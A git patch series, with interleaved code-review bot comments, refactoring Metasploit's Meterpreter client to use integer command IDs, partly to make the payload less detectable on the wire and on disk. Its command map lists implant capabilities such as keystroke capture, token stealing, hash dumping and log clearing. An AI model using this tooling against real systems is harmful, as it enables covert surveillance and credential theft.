From 88d42f5d7f367f98124c24f87321da3e54dfe415 Mon Sep 17 00:00:00 2001 From: Jeffrey Martin Date: Thu, 14 May 2020 17:52:02 -0500 Subject: [PATCH 01/20] bump version to 6.0.0 in progress --- Gemfile.lock | 2 +- lib/metasploit/framework/version.rb | 2 +- 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index c6c4e334db6aa..6e42efc11cdc5 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (5.0.90) + metasploit-framework (6.0.0) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) diff --git a/lib/metasploit/framework/version.rb b/lib/metasploit/framework/version.rb index d5d7ba7a9ea17..eb4bcc5b17f3b 100644 --- a/lib/metasploit/framework/version.rb +++ b/lib/metasploit/framework/version.rb @@ -30,7 +30,7 @@ def self.get_hash end end - VERSION = "5.0.90" + VERSION = "6.0.0" MAJOR, MINOR, PATCH = VERSION.split('.').map { |x| x.to_i } PRERELEASE = 'dev' HASH = get_hash From 641f298819abc02cbf77e52c7778740aa3151acc Mon Sep 17 00:00:00 2001 
From: OJ Date: Tue, 28 Apr 2020 21:55:40 +1000 Subject: [PATCH 02/20] Support removal of TLV strings This first bit of code aims to add a "map" to the packet functionality that is able to translate to and from "method strings" to "command ids". IDs are sent across the wire, and they're now integers. This removes the need for the strings to be present in things like native meterp, and hence makes things a little less obvious on the wire, and way less obvious on disk/in the payload. Given that we need this functionality in other Meterpreters to support the removal of strings, some code has been added that can generate source files for Python, C# and C. This code might move, but for now it's at least in a spot where it's used the most. --- lib/rex/post/meterpreter/client.rb | 3 +- lib/rex/post/meterpreter/client_core.rb | 6 +- .../extensions/powershell/powershell.rb | 8 + .../post/meterpreter/extensions/priv/priv.rb | 46 +- .../meterpreter/extensions/stdapi/mic/mic.rb | 6 +- .../socket_subsystem/tcp_server_channel.rb | 4 +- .../extensions/stdapi/webcam/webcam.rb | 10 +- .../meterpreter/extensions/winpmem/winpmem.rb | 2 +- lib/rex/post/meterpreter/packet.rb | 466 +++++++++++++++++- lib/rex/post/meterpreter/packet_dispatcher.rb | 6 + .../console/command_dispatcher/powershell.rb | 39 +- 11 files changed, 555 insertions(+), 41 deletions(-) diff --git a/lib/rex/post/meterpreter/client.rb b/lib/rex/post/meterpreter/client.rb index 6adfd35f177bb..4fa77316b5242 100644 --- a/lib/rex/post/meterpreter/client.rb +++ b/lib/rex/post/meterpreter/client.rb @@ -316,7 +316,8 @@ def method_missing(symbol, *args) # registered extension that can be reached through client.ext.[extension]. # def add_extension(name, commands=[]) - self.commands |= commands + self.commands |= [] + self.commands.concat(commands.map {|v| Rex::Post::Meterpreter.command_id_to_method_string(v)}) # Check to see if this extension has already been loaded. if ((klass = self.class.check_ext_hash(name.downcase)) == nil) 
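Review bot: `self.commands |= []` accomplishes nothing — `Array#|` with an empty array returns the existing contents unchanged, and if `commands` were ever nil the expression would evaluate to `true` (NilClass#| returns a boolean), not an empty Array — while the `concat` that follows drops the set-union semantics of the removed `self.commands |= commands`, so re-adding an extension now duplicates its command names in `self.commands`. Replace both added lines with `self.commands |= commands.map { |v| Rex::Post::Meterpreter.command_id_to_method_string(v) }`. Note also that `command_id_to_method_string` raises ArgumentError for any id absent from the client-side `COMMAND_ID_MAP`, so a payload that reports one command id this framework build does not know will abort the whole `add_extension` instead of just losing that command; consider skipping unknown ids with a warning. The body of `add_extension` continues past the end of the hunk.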
diff --git a/lib/rex/post/meterpreter/client_core.rb b/lib/rex/post/meterpreter/client_core.rb index 8c68e54c4cb9e..18e013e29ec03 100644 --- a/lib/rex/post/meterpreter/client_core.rb +++ b/lib/rex/post/meterpreter/client_core.rb @@ -125,7 +125,7 @@ def get_loaded_extension_commands(extension_name) end commands = [] - response.each(TLV_TYPE_STRING) { |c| + response.each(TLV_TYPE_UINT) { |c| commands << c.value } @@ -295,11 +295,11 @@ def load_library(opts) end commands = [] - response.each(TLV_TYPE_METHOD) { |c| + response.each(TLV_TYPE_UINT) { |c| commands << c.value } - return commands + commands end # diff --git a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb index 810aa24e622d7..08afb46b7f98d 100644 --- a/lib/rex/post/meterpreter/extensions/powershell/powershell.rb +++ b/lib/rex/post/meterpreter/extensions/powershell/powershell.rb @@ -55,6 +55,14 @@ def import_file(opts={}) return false end + def session_remove(opts={}) + return false unless opts[:session_id] + request = Packet.create_request('powershell_session_remove') + request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id]) if opts[:session_id] + client.send_request(request) + return true + end + def execute_string(opts={}) return nil unless opts[:code] diff --git a/lib/rex/post/meterpreter/extensions/priv/priv.rb b/lib/rex/post/meterpreter/extensions/priv/priv.rb index 091b3ebe7a7bd..ffadc6630e714 100644 --- a/lib/rex/post/meterpreter/extensions/priv/priv.rb +++ b/lib/rex/post/meterpreter/extensions/priv/priv.rb 
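Review bot: In `session_remove` the `if opts[:session_id]` modifier on the `add_tlv` line is dead code: the guard clause two lines above already returns `false` when the key is absent, so the modifier only makes a reader wonder which path is real. Drop it: `request.add_tlv(TLV_TYPE_POWERSHELL_SESSIONID, opts[:session_id])`. The return value of `client.send_request(request)` is also discarded, so the method answers `true` even if the server reports a failure, unless `send_request` raises on a non-zero result by itself (not visible in this hunk); if it does not, `response = client.send_request(request)` followed by `response.result == 0` would report the outcome honestly to `cmd_powershell_session_remove`, which prints a success message on a truthy return. The method is complete within the hunk.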
@@ -43,33 +43,39 @@ def initialize(client) def getsystem( technique=0 ) request = Packet.create_request( 'priv_elevate_getsystem' ) - elevator_name = Rex::Text.rand_text_alpha_lower( 6 ) + # We only need the elevate DLL for when we're invoking the tokendup + # method, which we'll only use if required (ie. trying all or when + # that metdho is asked for explicitly) + if [0, 3].include?(technique) + elevator_name = Rex::Text.rand_text_alpha_lower( 6 ) - elevator_path = nil - client.binary_suffix.each { |s| - elevator_path = MetasploitPayloads.meterpreter_path('elevator', s) - if !elevator_path.nil? - break - end - } - if elevator_path.nil? - elevators = "" + elevator_path = nil client.binary_suffix.each { |s| - elevators << "elevator.#{s}, " + elevator_path = MetasploitPayloads.meterpreter_path('elevator', s) + if !elevator_path.nil? + break + end } - raise RuntimeError, "#{elevators.chomp(', ')} not found", caller - end + if elevator_path.nil? + elevators = "" + client.binary_suffix.each { |s| + elevators << "elevator.#{s}, " + } + raise RuntimeError, "#{elevators.chomp(', ')} not found", caller + end - elevator_data = "" + elevator_data = "" - ::File.open( elevator_path, "rb" ) { |f| - elevator_data += f.read( f.stat.size ) - } + ::File.open( elevator_path, "rb" ) { |f| + elevator_data += f.read( f.stat.size ) + } + + request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name ) + request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data ) + request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length ) + end request.add_tlv( TLV_TYPE_ELEVATE_TECHNIQUE, technique ) - request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_NAME, elevator_name ) - request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_DLL, elevator_data ) - request.add_tlv( TLV_TYPE_ELEVATE_SERVICE_LENGTH, elevator_data.length ) # as some service routines can be slow we bump up the timeout to 90 seconds response = client.send_request( request, 90 ) 
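Review bot: The gate `[0, 3].include?(technique)` hard-codes two magic numbers whose meaning is only recoverable from the comment above it, and that comment has typos ("metdho", "ie.") in the one place that explains them; name the values next to the extension's TLV constants, e.g. `ELEVATE_TECHNIQUE_ANY = 0` and `ELEVATE_TECHNIQUE_TOKENDUP = 3`, and write `if [ELEVATE_TECHNIQUE_ANY, ELEVATE_TECHNIQUE_TOKENDUP].include?(technique)`. The comment should read `# We only need the elevator DLL for the token-duplication technique, which we use only when trying all techniques or when that method is requested explicitly.`. If any caller passes `technique` as a String (console input, for instance), the integer `include?` test silently skips the DLL and the server receives no SERVICE TLVs at all; a `technique = technique.to_i` at the top of the method, or an explicit type check, would close that gap — to be confirmed against the callers. `getsystem` continues past the end of the hunk.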
diff --git a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb index 0821053cb845f..08d61e42fce92 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/mic/mic.rb @@ -26,7 +26,7 @@ def session # List available microphones def mic_list - response = client.send_request(Packet.create_request('audio_mic_list')) + response = client.send_request(Packet.create_request('stdapi_audio_mic_list')) names = [] if response.result == 0 response.get_tlvs(TLV_TYPE_AUDIO_INTERFACE_NAME).each do |tlv| @@ -38,7 +38,7 @@ def mic_list # Starts recording audio from microphone def mic_start(device_id) - request = Packet.create_request('audio_mic_start') + request = Packet.create_request('stdapi_audio_mic_start') request.add_tlv(TLV_TYPE_AUDIO_INTERFACE_ID, device_id) response = client.send_request(request) return nil unless response.result == 0 @@ -48,7 +48,7 @@ def mic_start(device_id) # Stop recording from microphone def mic_stop - client.send_request(Packet.create_request('audio_mic_stop')) + client.send_request(Packet.create_request('stdapi_audio_mic_stop')) true end diff --git a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb index 743cdfc4a89fa..fdc3d9b58cbc4 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/net/socket_subsystem/tcp_server_channel.rb 
@@ -29,12 +29,12 @@ class TcpServerChannel < Rex::Post::Meterpreter::Channel # # This is the request handler which is registered to the respective meterpreter instance via # Rex::Post::Meterpreter::Extensions::Stdapi::Net::Socket. All incoming requests from the meterpreter - # for a 'tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request + # for a 'stdapi_net_tcp_channel_open' will be processed here. We create a new TcpClientChannel for each request # received and store it in the respective tcp server channels list of new pending client channels. # These new tcp client channels are passed off via a call the the tcp server channels accept() method. # def self.request_handler(client, packet) - return false unless packet.method == "tcp_channel_open" + return false unless packet.method == "stdapi_net_tcp_channel_open" cid = packet.get_tlv_value( TLV_TYPE_CHANNEL_ID ) pid = packet.get_tlv_value( TLV_TYPE_CHANNEL_PARENTID ) diff --git a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb index 366cd8f09c3d0..2797efba518fc 100644 --- a/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb +++ b/lib/rex/post/meterpreter/extensions/stdapi/webcam/webcam.rb @@ -26,7 +26,7 @@ def session end def webcam_list - response = client.send_request(Packet.create_request('webcam_list')) + response = client.send_request(Packet.create_request('stdapi_webcam_list')) names = [] response.get_tlvs(TLV_TYPE_WEBCAM_NAME).each do |tlv| names << tlv.value 
@@ -36,21 +36,21 @@ def webcam_list # Starts recording video from video source of index +cam+ def webcam_start(cam) - request = Packet.create_request('webcam_start') + request = Packet.create_request('stdapi_webcam_start') request.add_tlv(TLV_TYPE_WEBCAM_INTERFACE_ID, cam) client.send_request(request) true end def webcam_get_frame(quality) - request = Packet.create_request('webcam_get_frame') + request = Packet.create_request('stdapi_webcam_get_frame') request.add_tlv(TLV_TYPE_WEBCAM_QUALITY, quality) response = client.send_request(request) response.get_tlv(TLV_TYPE_WEBCAM_IMAGE).value end def webcam_stop - client.send_request(Packet.create_request('webcam_stop')) + client.send_request(Packet.create_request('stdapi_webcam_stop')) true end @@ -77,7 +77,7 @@ def webcam_chat(server) # Record from default audio source for +duration+ seconds; # returns a low-quality wav file def record_mic(duration) - request = Packet.create_request('webcam_audio_record') + request = Packet.create_request('stdapi_webcam_audio_record') request.add_tlv(TLV_TYPE_AUDIO_DURATION, duration) response = client.send_request(request) response.get_tlv(TLV_TYPE_AUDIO_DATA).value diff --git a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb index c5fce52bcf3ec..4e9173190fc9e 100644 --- a/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb +++ b/lib/rex/post/meterpreter/extensions/winpmem/winpmem.rb @@ -33,7 +33,7 @@ def initialize(client) end def dump_ram - request = Packet.create_request('dump_ram') + request = Packet.create_request('winpmem_dump_ram') response = client.send_request(request) response_code = response.get_tlv_value(TLV_TYPE_WINPMEM_ERROR_CODE) diff --git a/lib/rex/post/meterpreter/packet.rb b/lib/rex/post/meterpreter/packet.rb index e666c16231cd5..2dcb91488aba9 100644 --- a/lib/rex/post/meterpreter/packet.rb +++ b/lib/rex/post/meterpreter/packet.rb 
@@ -50,7 +50,7 @@ module Meterpreter # TLV Specific Types # TLV_TYPE_ANY = TLV_META_TYPE_NONE | 0 -TLV_TYPE_METHOD = TLV_META_TYPE_STRING | 1 +TLV_TYPE_METHOD = TLV_META_TYPE_UINT | 1 TLV_TYPE_REQUEST_ID = TLV_META_TYPE_STRING | 2 TLV_TYPE_EXCEPTION = TLV_META_TYPE_GROUP | 3 TLV_TYPE_RESULT = TLV_META_TYPE_UINT | 4 
@@ -136,6 +136,461 @@ module Meterpreter GUID_SIZE = 16 NULL_GUID = "\x00" * GUID_SIZE +# +# Mapping of command strings to identifiers +# +# +COMMAND_ID_START_CORE = 0 +COMMAND_ID_START_STDAPI = 1000 +COMMAND_ID_START_PRIV = 2000 +COMMAND_ID_START_EXTAPI = 3000 +COMMAND_ID_START_SNIFFER = 4000 +COMMAND_ID_START_ANDROID = 5000 +COMMAND_ID_START_NETWORKPUG = 6000 +COMMAND_ID_START_WINPMEM = 7000 +COMMAND_ID_START_KIWI = 8000 +COMMAND_ID_START_APPAPI = 9000 +COMMAND_ID_START_UNHOOK = 10000 +COMMAND_ID_START_ESPIA = 11000 +COMMAND_ID_START_INCOGNITO = 12000 +COMMAND_ID_START_PYTHON = 13000 +COMMAND_ID_START_POWERSHELL = 14000 +COMMAND_ID_START_LANATTACKS = 15000 +COMMAND_ID_START_PEINJECTOR = 16000 +COMMAND_ID_START_MIMIKATZ = 17000 + +COMMAND_ID_MAP_CORE = { + 'core_channel_close' => COMMAND_ID_START_CORE + 1, + 'core_channel_eof' => COMMAND_ID_START_CORE + 2, + 'core_channel_interact' => COMMAND_ID_START_CORE + 3, + 'core_channel_open' => COMMAND_ID_START_CORE + 4, + 'core_channel_read' => COMMAND_ID_START_CORE + 5, + 'core_channel_seek' => COMMAND_ID_START_CORE + 6, + 'core_channel_tell' => COMMAND_ID_START_CORE + 7, + 'core_channel_write' => COMMAND_ID_START_CORE + 8, + 'core_console_write' => COMMAND_ID_START_CORE + 9, + 'core_enumextcmd' => COMMAND_ID_START_CORE + 10, + 'core_get_session_guid' => COMMAND_ID_START_CORE + 11, + 'core_loadlib' => COMMAND_ID_START_CORE + 12, + 'core_machine_id' => COMMAND_ID_START_CORE + 13, + 'core_migrate' => COMMAND_ID_START_CORE + 14, + 'core_native_arch' => COMMAND_ID_START_CORE + 15, + 'core_negotiate_tlv_encryption' => COMMAND_ID_START_CORE + 16, + 'core_patch_url' => COMMAND_ID_START_CORE + 17, + 'core_pivot_add' => COMMAND_ID_START_CORE + 18, + 'core_pivot_remove' => COMMAND_ID_START_CORE + 19, + 'core_pivot_session_died' => COMMAND_ID_START_CORE + 20, + 'core_set_session_guid' => COMMAND_ID_START_CORE + 21, + 'core_set_uuid' => COMMAND_ID_START_CORE + 22, + 'core_shutdown' => COMMAND_ID_START_CORE + 23, + 
'core_transport_add' => COMMAND_ID_START_CORE + 24, + 'core_transport_change' => COMMAND_ID_START_CORE + 25, + 'core_transport_getcerthash' => COMMAND_ID_START_CORE + 26, + 'core_transport_list' => COMMAND_ID_START_CORE + 27, + 'core_transport_next' => COMMAND_ID_START_CORE + 28, + 'core_transport_prev' => COMMAND_ID_START_CORE + 29, + 'core_transport_remove' => COMMAND_ID_START_CORE + 30, + 'core_transport_setcerthash' => COMMAND_ID_START_CORE + 31, + 'core_transport_set_timeouts' => COMMAND_ID_START_CORE + 32, + 'core_transport_sleep' => COMMAND_ID_START_CORE + 33, +} + +COMMAND_ID_MAP_STDAPI = { + 'stdapi_fs_chdir' => COMMAND_ID_START_STDAPI + 1, + 'stdapi_fs_chmod' => COMMAND_ID_START_STDAPI + 2, + 'stdapi_fs_delete_dir' => COMMAND_ID_START_STDAPI + 3, + 'stdapi_fs_delete_file' => COMMAND_ID_START_STDAPI + 4, + 'stdapi_fs_file_copy' => COMMAND_ID_START_STDAPI + 5, + 'stdapi_fs_file_expand_path' => COMMAND_ID_START_STDAPI + 6, + 'stdapi_fs_file_move' => COMMAND_ID_START_STDAPI + 7, + 'stdapi_fs_getwd' => COMMAND_ID_START_STDAPI + 8, + 'stdapi_fs_ls' => COMMAND_ID_START_STDAPI + 9, + 'stdapi_fs_md5' => COMMAND_ID_START_STDAPI + 10, + 'stdapi_fs_mkdir' => COMMAND_ID_START_STDAPI + 11, + 'stdapi_fs_mount_show' => COMMAND_ID_START_STDAPI + 12, + 'stdapi_fs_search' => COMMAND_ID_START_STDAPI + 13, + 'stdapi_fs_separator' => COMMAND_ID_START_STDAPI + 14, + 'stdapi_fs_sha1' => COMMAND_ID_START_STDAPI + 15, + 'stdapi_fs_stat' => COMMAND_ID_START_STDAPI + 16, + 'stdapi_net_config_add_route' => COMMAND_ID_START_STDAPI + 17, + 'stdapi_net_config_get_arp_table' => COMMAND_ID_START_STDAPI + 18, + 'stdapi_net_config_get_interfaces' => COMMAND_ID_START_STDAPI + 19, + 'stdapi_net_config_get_netstat' => COMMAND_ID_START_STDAPI + 20, + 'stdapi_net_config_get_proxy' => COMMAND_ID_START_STDAPI + 21, + 'stdapi_net_config_get_routes' => COMMAND_ID_START_STDAPI + 22, + 'stdapi_net_config_remove_route' => COMMAND_ID_START_STDAPI + 23, + 'stdapi_net_resolve_host' => 
COMMAND_ID_START_STDAPI + 24, + 'stdapi_net_resolve_hosts' => COMMAND_ID_START_STDAPI + 25, + 'stdapi_net_socket_tcp_shutdown' => COMMAND_ID_START_STDAPI + 26, + 'stdapi_net_tcp_channel_open' => COMMAND_ID_START_STDAPI + 27, + 'stdapi_railgun_api' => COMMAND_ID_START_STDAPI + 28, + 'stdapi_railgun_api_multi' => COMMAND_ID_START_STDAPI + 29, + 'stdapi_railgun_memread' => COMMAND_ID_START_STDAPI + 30, + 'stdapi_railgun_memwrite' => COMMAND_ID_START_STDAPI + 31, + 'stdapi_registry_check_key_exists' => COMMAND_ID_START_STDAPI + 32, + 'stdapi_registry_close_key' => COMMAND_ID_START_STDAPI + 33, + 'stdapi_registry_create_key' => COMMAND_ID_START_STDAPI + 34, + 'stdapi_registry_delete_key' => COMMAND_ID_START_STDAPI + 35, + 'stdapi_registry_delete_value' => COMMAND_ID_START_STDAPI + 36, + 'stdapi_registry_enum_key' => COMMAND_ID_START_STDAPI + 37, + 'stdapi_registry_enum_key_direct' => COMMAND_ID_START_STDAPI + 38, + 'stdapi_registry_enum_value' => COMMAND_ID_START_STDAPI + 39, + 'stdapi_registry_enum_value_direct' => COMMAND_ID_START_STDAPI + 40, + 'stdapi_registry_load_key' => COMMAND_ID_START_STDAPI + 41, + 'stdapi_registry_open_key' => COMMAND_ID_START_STDAPI + 42, + 'stdapi_registry_open_remote_key' => COMMAND_ID_START_STDAPI + 43, + 'stdapi_registry_query_class' => COMMAND_ID_START_STDAPI + 44, + 'stdapi_registry_query_value' => COMMAND_ID_START_STDAPI + 45, + 'stdapi_registry_query_value_direct' => COMMAND_ID_START_STDAPI + 46, + 'stdapi_registry_set_value' => COMMAND_ID_START_STDAPI + 47, + 'stdapi_registry_set_value_direct' => COMMAND_ID_START_STDAPI + 48, + 'stdapi_registry_unload_key' => COMMAND_ID_START_STDAPI + 49, + 'stdapi_sys_config_driver_list' => COMMAND_ID_START_STDAPI + 50, + 'stdapi_sys_config_drop_token' => COMMAND_ID_START_STDAPI + 51, + 'stdapi_sys_config_getenv' => COMMAND_ID_START_STDAPI + 52, + 'stdapi_sys_config_getprivs' => COMMAND_ID_START_STDAPI + 53, + 'stdapi_sys_config_getsid' => COMMAND_ID_START_STDAPI + 54, + 'stdapi_sys_config_getuid' 
=> COMMAND_ID_START_STDAPI + 55, + 'stdapi_sys_config_localtime' => COMMAND_ID_START_STDAPI + 56, + 'stdapi_sys_config_rev2self' => COMMAND_ID_START_STDAPI + 57, + 'stdapi_sys_config_steal_token' => COMMAND_ID_START_STDAPI + 58, + 'stdapi_sys_config_sysinfo' => COMMAND_ID_START_STDAPI + 59, + 'stdapi_sys_eventlog_clear' => COMMAND_ID_START_STDAPI + 60, + 'stdapi_sys_eventlog_close' => COMMAND_ID_START_STDAPI + 61, + 'stdapi_sys_eventlog_numrecords' => COMMAND_ID_START_STDAPI + 62, + 'stdapi_sys_eventlog_oldest' => COMMAND_ID_START_STDAPI + 63, + 'stdapi_sys_eventlog_open' => COMMAND_ID_START_STDAPI + 64, + 'stdapi_sys_eventlog_read' => COMMAND_ID_START_STDAPI + 65, + 'stdapi_sys_power_exitwindows' => COMMAND_ID_START_STDAPI + 66, + 'stdapi_sys_process_attach' => COMMAND_ID_START_STDAPI + 67, + 'stdapi_sys_process_close' => COMMAND_ID_START_STDAPI + 68, + 'stdapi_sys_process_execute' => COMMAND_ID_START_STDAPI + 69, + 'stdapi_sys_process_get_info' => COMMAND_ID_START_STDAPI + 70, + 'stdapi_sys_process_get_processes' => COMMAND_ID_START_STDAPI + 71, + 'stdapi_sys_process_getpid' => COMMAND_ID_START_STDAPI + 72, + 'stdapi_sys_process_image_get_images' => COMMAND_ID_START_STDAPI + 73, + 'stdapi_sys_process_image_get_proc_address' => COMMAND_ID_START_STDAPI + 74, + 'stdapi_sys_process_image_load' => COMMAND_ID_START_STDAPI + 75, + 'stdapi_sys_process_image_unload' => COMMAND_ID_START_STDAPI + 76, + 'stdapi_sys_process_kill' => COMMAND_ID_START_STDAPI + 77, + 'stdapi_sys_process_memory_allocate' => COMMAND_ID_START_STDAPI + 78, + 'stdapi_sys_process_memory_free' => COMMAND_ID_START_STDAPI + 79, + 'stdapi_sys_process_memory_lock' => COMMAND_ID_START_STDAPI + 80, + 'stdapi_sys_process_memory_protect' => COMMAND_ID_START_STDAPI + 81, + 'stdapi_sys_process_memory_query' => COMMAND_ID_START_STDAPI + 82, + 'stdapi_sys_process_memory_read' => COMMAND_ID_START_STDAPI + 83, + 'stdapi_sys_process_memory_unlock' => COMMAND_ID_START_STDAPI + 84, + 'stdapi_sys_process_memory_write' 
=> COMMAND_ID_START_STDAPI + 85, + 'stdapi_sys_process_thread_close' => COMMAND_ID_START_STDAPI + 86, + 'stdapi_sys_process_thread_create' => COMMAND_ID_START_STDAPI + 87, + 'stdapi_sys_process_thread_get_threads' => COMMAND_ID_START_STDAPI + 88, + 'stdapi_sys_process_thread_open' => COMMAND_ID_START_STDAPI + 89, + 'stdapi_sys_process_thread_query_regs' => COMMAND_ID_START_STDAPI + 90, + 'stdapi_sys_process_thread_resume' => COMMAND_ID_START_STDAPI + 91, + 'stdapi_sys_process_thread_set_regs' => COMMAND_ID_START_STDAPI + 92, + 'stdapi_sys_process_thread_suspend' => COMMAND_ID_START_STDAPI + 93, + 'stdapi_sys_process_thread_terminate' => COMMAND_ID_START_STDAPI + 94, + 'stdapi_sys_process_wait' => COMMAND_ID_START_STDAPI + 95, + 'stdapi_ui_desktop_enum' => COMMAND_ID_START_STDAPI + 96, + 'stdapi_ui_desktop_get' => COMMAND_ID_START_STDAPI + 97, + 'stdapi_ui_desktop_screenshot' => COMMAND_ID_START_STDAPI + 98, + 'stdapi_ui_desktop_set' => COMMAND_ID_START_STDAPI + 99, + 'stdapi_ui_enable_keyboard' => COMMAND_ID_START_STDAPI + 100, + 'stdapi_ui_enable_mouse' => COMMAND_ID_START_STDAPI + 101, + 'stdapi_ui_get_idle_time' => COMMAND_ID_START_STDAPI + 102, + 'stdapi_ui_get_keys_utf8' => COMMAND_ID_START_STDAPI + 103, + 'stdapi_ui_send_keyevent' => COMMAND_ID_START_STDAPI + 104, + 'stdapi_ui_send_keys' => COMMAND_ID_START_STDAPI + 105, + 'stdapi_ui_send_mouse' => COMMAND_ID_START_STDAPI + 106, + 'stdapi_ui_start_keyscan' => COMMAND_ID_START_STDAPI + 107, + 'stdapi_ui_stop_keyscan' => COMMAND_ID_START_STDAPI + 108, + 'stdapi_ui_unlock_desktop' => COMMAND_ID_START_STDAPI + 109, + 'stdapi_webcam_audio_record' => COMMAND_ID_START_STDAPI + 110, + 'stdapi_webcam_get_frame' => COMMAND_ID_START_STDAPI + 111, + 'stdapi_webcam_list' => COMMAND_ID_START_STDAPI + 112, + 'stdapi_webcam_start' => COMMAND_ID_START_STDAPI + 113, + 'stdapi_webcam_stop' => COMMAND_ID_START_STDAPI + 114, +} + +COMMAND_ID_MAP_ANDROID = { + 'android_activity_start' => COMMAND_ID_START_ANDROID + 1, + 
'android_check_root' => COMMAND_ID_START_ANDROID + 2, + 'android_device_shutdown' => COMMAND_ID_START_ANDROID + 3, + 'android_dump_calllog' => COMMAND_ID_START_ANDROID + 4, + 'android_dump_contacts' => COMMAND_ID_START_ANDROID + 5, + 'android_dump_sms' => COMMAND_ID_START_ANDROID + 6, + 'android_geolocate' => COMMAND_ID_START_ANDROID + 7, + 'android_hide_app_icon' => COMMAND_ID_START_ANDROID + 8, + 'android_interval_collect' => COMMAND_ID_START_ANDROID + 9, + 'android_send_sms' => COMMAND_ID_START_ANDROID + 10, + 'android_set_audio_mode' => COMMAND_ID_START_ANDROID + 11, + 'android_set_wallpaper' => COMMAND_ID_START_ANDROID + 12, + 'android_sqlite_query' => COMMAND_ID_START_ANDROID + 13, + 'android_wakelock' => COMMAND_ID_START_ANDROID + 14, + 'android_wlan_geolocate' => COMMAND_ID_START_ANDROID + 15, +} + +COMMAND_ID_MAP_APPAPI = { + 'appapi_app_install' => COMMAND_ID_START_APPAPI + 1, + 'appapi_app_list' => COMMAND_ID_START_APPAPI + 2, + 'appapi_app_run' => COMMAND_ID_START_APPAPI + 3, + 'appapi_app_uninstall' => COMMAND_ID_START_APPAPI + 4, +} + +COMMAND_ID_MAP_WINPMEM = { + 'winpmem_dump_ram' => COMMAND_ID_START_WINPMEM + 1, +} + +COMMAND_ID_MAP_ESPIA = { + 'espia_image_get_dev_screen' => COMMAND_ID_START_ESPIA + 1, +} + +COMMAND_ID_MAP_EXTAPI = { + 'extapi_adsi_domain_query' => COMMAND_ID_START_EXTAPI + 1, + 'extapi_clipboard_get_data' => COMMAND_ID_START_EXTAPI + 2, + 'extapi_clipboard_monitor_dump' => COMMAND_ID_START_EXTAPI + 3, + 'extapi_clipboard_monitor_pause' => COMMAND_ID_START_EXTAPI + 4, + 'extapi_clipboard_monitor_purge' => COMMAND_ID_START_EXTAPI + 5, + 'extapi_clipboard_monitor_resume' => COMMAND_ID_START_EXTAPI + 6, + 'extapi_clipboard_monitor_start' => COMMAND_ID_START_EXTAPI + 7, + 'extapi_clipboard_monitor_stop' => COMMAND_ID_START_EXTAPI + 8, + 'extapi_clipboard_set_data' => COMMAND_ID_START_EXTAPI + 9, + 'extapi_ntds_parse' => COMMAND_ID_START_EXTAPI + 10, + 'extapi_pageant_send_query' => COMMAND_ID_START_EXTAPI + 11, + 
'extapi_service_control' => COMMAND_ID_START_EXTAPI + 12, + 'extapi_service_enum' => COMMAND_ID_START_EXTAPI + 13, + 'extapi_service_query' => COMMAND_ID_START_EXTAPI + 14, + 'extapi_window_enum' => COMMAND_ID_START_EXTAPI + 15, + 'extapi_wmi_query' => COMMAND_ID_START_EXTAPI + 16, +} + +COMMAND_ID_MAP_INCOGNITO = { + 'incognito_add_group_user' => COMMAND_ID_START_INCOGNITO + 1, + 'incognito_add_localgroup_user' => COMMAND_ID_START_INCOGNITO + 2, + 'incognito_add_user' => COMMAND_ID_START_INCOGNITO + 3, + 'incognito_impersonate_token' => COMMAND_ID_START_INCOGNITO + 4, + 'incognito_list_tokens' => COMMAND_ID_START_INCOGNITO + 5, + 'incognito_snarf_hashes' => COMMAND_ID_START_INCOGNITO + 6, +} + +COMMAND_ID_MAP_KIWI = { + 'kiwi_exec_cmd' => COMMAND_ID_START_KIWI + 1, +} + +COMMAND_ID_MAP_LANATTACKS = { + 'lanattacks_add_tftp_file' => COMMAND_ID_START_LANATTACKS + 1, + 'lanattacks_dhcp_log' => COMMAND_ID_START_LANATTACKS + 2, + 'lanattacks_reset_dhcp' => COMMAND_ID_START_LANATTACKS + 3, + 'lanattacks_reset_tftp' => COMMAND_ID_START_LANATTACKS + 4, + 'lanattacks_set_dhcp_option' => COMMAND_ID_START_LANATTACKS + 5, + 'lanattacks_start_dhcp' => COMMAND_ID_START_LANATTACKS + 6, + 'lanattacks_start_tftp' => COMMAND_ID_START_LANATTACKS + 7, + 'lanattacks_stop_dhcp' => COMMAND_ID_START_LANATTACKS + 8, + 'lanattacks_stop_tftp' => COMMAND_ID_START_LANATTACKS + 9, +} + +COMMAND_ID_MAP_MIMIKATZ = { + 'mimikatz_custom_command' => COMMAND_ID_START_MIMIKATZ + 1, +} + +COMMAND_ID_MAP_NETWORKPUG = { + 'networkpug_start' => COMMAND_ID_START_NETWORKPUG + 1, + 'networkpug_stop' => COMMAND_ID_START_NETWORKPUG + 2, +} + +COMMAND_ID_MAP_PEINJECTOR = { + 'peinjector_inject_shellcode' => COMMAND_ID_START_PEINJECTOR + 1, +} + +COMMAND_ID_MAP_POWERSHELL = { + 